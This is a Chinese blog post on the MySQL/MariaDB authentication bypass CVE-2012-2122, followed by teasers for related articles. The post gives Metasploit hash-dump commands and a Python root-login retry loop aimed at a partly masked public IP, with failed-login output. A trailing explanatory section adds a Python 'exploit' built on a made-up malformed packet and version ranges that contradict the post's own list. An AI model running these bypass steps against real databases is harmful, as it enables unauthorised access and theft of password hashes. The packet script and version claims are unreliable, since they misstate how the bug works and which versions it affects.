Mysql身份认证漏洞 CVE-2012-2122

最新推荐文章于 2025-10-25 11:05:13 发布
原创 最新推荐文章于 2025-10-25 11:05:13 发布 · 948 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了MySQL身份认证漏洞CVE-2012-2122,该漏洞允许攻击者通过不断尝试登录,绕过安全限制。所有版本低于5.1.61、5.2.11、5.3.5、5.5.22的MySQL和MariaDB都受影响。漏洞危害包括无需正确密码即可登录数据库。已提供修复补丁和验证方法。

Mysql身份认证漏洞 CVE-2012-2122

一、漏洞介绍

MariaDB和MySQL在用户验证的处理上存在漏洞。攻击者可利用该漏洞绕过某些安全限制,也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

受影响的产品:

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

二、漏洞危害

攻击者只要知道用户名,不断尝试就能够直接登入SQL数据库。

三、漏洞验证

使用MSF验证:

root@kali:~# msfconsole 
msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 119.23.***.***
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run

在这里插入图片描述

使用python脚本验证:

root@kali:~# cat mysql_poc.py 
#!/usr/bin/python
import subprocess

while 1:
	subprocess.Popen("mysql -h 119.23.***.*** -P 3306 -u root --password=blah", shell=True).wait()

root@kali:~# python mysql_poc.py 
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES)
ERROR 1045 (28000): Access denied
最低0.47元/天 解锁文章
CVE-2012-2122 mysql/mariaDB身份认证漏洞
weixin_68177269的博客
08-12 744
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,不断的尝试登录连接,回导致MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。影响范围#所有的Mariadb和mysql版本:5.1.61、5.0.11、5.3.5、5.5.22。可见经过大数量的暴力登录之后,直接不需要密码登录到mysql。使用docker-compose 创建靶场环境。下载安装vulhub靶场环境。二、msf漏洞scan探测。不知道为什么没跑出来🥴。
CVE 2012-2122
qq_56895581的博客
05-19 459
我们使用exp在对应版本上的服务进行登陆时,即便密码错误也能成功以root用户登录
MySQL身份认证漏洞复现:原理详解+环境搭建+渗透实践(CVE-2012-2122 两种方法渗透)
最新发布
mooyuan的网络安全博客
10-25 1274
本文详细分析了MySQL数据库中的高危身份认证绕过漏洞CVE-2012-2122。该漏洞存在于特定版本的MySQL和MariaDB中,由于memcmp()函数比较缺陷,攻击者可通过反复尝试登录绕过认证,获取数据库访问权限。文章通过Vulhub搭建漏洞环境,使用Metasploit和脚本两种方法进行渗透测试,成功获取root账户哈希值并解密。漏洞修复方案包括升级到安全版本(5.5.24+)、限制3306端口访问和加强登录监控。该漏洞利用简单但危害严重,可导致数据库完全沦陷。
MySQL 身份认证漏洞 CVE-2012-2122
MateSnake的博客
05-11 517
MySQL 身份认证漏洞复现 CVE-2012-2122
mysql身份认证绕过漏洞复现(CVE-2012-2122
weixin_53730939的博客
03-12 1852
mysql身份认证绕过漏洞复现(CVE-2012-2122
CVE-2012-2122: MySQL身份认证漏洞
Yatere的天平秤
06-11 1997
http://seclists.org/oss-sec/2012/q2/493 我今天早上打开电脑,在seclists中看到一个很惊人的thread:http://seclists.org/oss-sec/2012/q2/493MySQL爆出了一个很大的安全漏洞,几乎影响5.1至5.5的所有版本。出问题的模块是登录时密码校验的部分(password.c),在知道用户名的情况下(如
Mysql 身份认证绕过漏洞CVE-2012-2122)复现
weixin_57379923的博客
08-09 1158
这段代码的主要目的是尝试通过 MySQL 客户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。将这些数字赋值给变量。
Mysql身份认证漏洞复现(CVE-2012-2122)
qq_61947585的博客
07-06 452
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。
MySql-身份认证绕过-CVE-2012-2122
m0_57206390的博客
10-27 526
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
Mysql 身份认证绕过漏洞CVE-2012-2122
ws_001的博客
06-12 1910
Mysql 身份认证绕过漏洞CVE-2012-2122
MySQL身份认证绕过漏洞CVE-2012-2122
qq115399231的博客
07-16 3643
漏洞介绍 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 这个缺陷的根源在于memcmp()函数总是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的概率约为1:256。 受影响版...
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4986
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
CVE-2012-2122-mysql未授权访问漏洞复现-vulhub
c0529的博客
06-12 1161
简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入使用:kali+vulhub。
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2922
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
Mysql CVE-2012-2122(vulhub)漏洞复现
MDSEC的博客
08-23 518
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
CVE-2012-2122Mysql身份认证漏洞
weixin_45253622的博客
05-27 6510
目录 漏洞描述 影响版本 漏洞复现 使用MSF进行检测: 使用Linux执行命令进行爆破复现: ​使用python脚本进行复现: 漏洞修复 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1...
Mysql身份认证漏洞及利用(CVE-2012-2122)
Peter 的博客
02-13 3228
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。 受影响的产品: All MariaDB and MySQL versions up to 5.1.6...
cve-2012-2122漏洞原理
06-18
### CVE-2012-2122 漏洞原理及影响 #### 漏洞背景 CVE-2012-2122 是一个存在于 MySQL 和 MariaDB 中的身份认证绕过漏洞。该漏洞利用了 `memcmp` 函数在特定编译环境下的行为差异,使得攻击者可以通过构造恶意数据包绕过身份验证[^3]。 #### 漏洞原理 MySQL 的身份验证过程依赖于对客户端提供的散列值与服务器存储的散列值进行比较。此比较操作使用了 C 标准库中的 `memcmp` 函数。然而,在某些编译环境下,`memcmp` 函数的行为可能不符合预期。具体来说,当 MySQL 在编译时启用了 `-fno-builtin` 选项,并且使用的 glibc 是经过 SSE 优化后的版本时,`memcmp` 可能返回超出 `[127, -128]` 范围的结果。这种行为导致了 MySQL 在处理身份验证时未能正确判断两个字符串是否相等[^3]。 攻击者可以利用这一特性,通过发送特制的数据包使 `memcmp` 返回值为零,即使实际的散列值不匹配,也能成功绕过身份验证。例如,攻击者可以尝试连接到目标 MySQL 数据库,并不断重试直到成功登录[^3]。 #### 影响范围 受影响的 MySQL 版本包括: - MySQL 5.1.62 及更早版本 - MySQL 5.5.23 及更早版本 - MySQL 5.6.6 及更早版本 受影响的 MariaDB 版本包括: - MariaDB 5.1.62 及更早版本 - MariaDB 5.2.12 及更早版本 - MariaDB 5.3.6 及更早版本 - MariaDB 5.5.23 及更早版本 #### 修复建议 为了防止 CVE-2012-2122 漏洞被利用,建议采取以下措施: 1. 升级到不受影响的 MySQL 或 MariaDB 版本,例如 MySQL 5.1.63、5.5.24、5.6.6 或更高版本,以及 MariaDB 5.1.62、5.2.12、5.3.6、5.5.23 或更高版本。 2. 如果无法立即升级,可以在防火墙上关闭 MySQL 端口以减少暴露风险[^3]。 #### 漏洞复现 在实验环境中复现 CVE-2012-2122 漏洞,可以使用以下步骤(仅限于授权测试环境): 1. 启动包含漏洞MySQL 环境,例如通过 Docker 使用 `vulhub/mysql/CVE-2012-2122` 镜像[^1]。 ```bash cd master/mysql/CVE-2012-2122 docker-compose up -d ``` 2. 使用工具或脚本尝试连接到目标 MySQL 实例并绕过身份验证。 以下是 Python 脚本示例,用于模拟 CVE-2012-2122 攻击: ```python import socket target = "192.168.100.40" port = 3306 # 构造恶意数据包 packet = b"\x0a" + b"A" * 255 + b"\x00" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, port)) sock.recv(1024) # 接收初始握手包 sock.send(packet) # 发送恶意数据包 response = sock.recv(1024) # 接收响应 if b"\x00" in response: print("身份验证绕过成功!") else: print("身份验证绕过失败!") finally: sock.close() ``` #### 安全影响 CVE-2012-2122 漏洞允许攻击者无需知道合法密码即可访问数据库系统,从而获取敏感数据或执行恶意操作。这可能导致数据泄露、篡改或其他严重后果。 ---
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值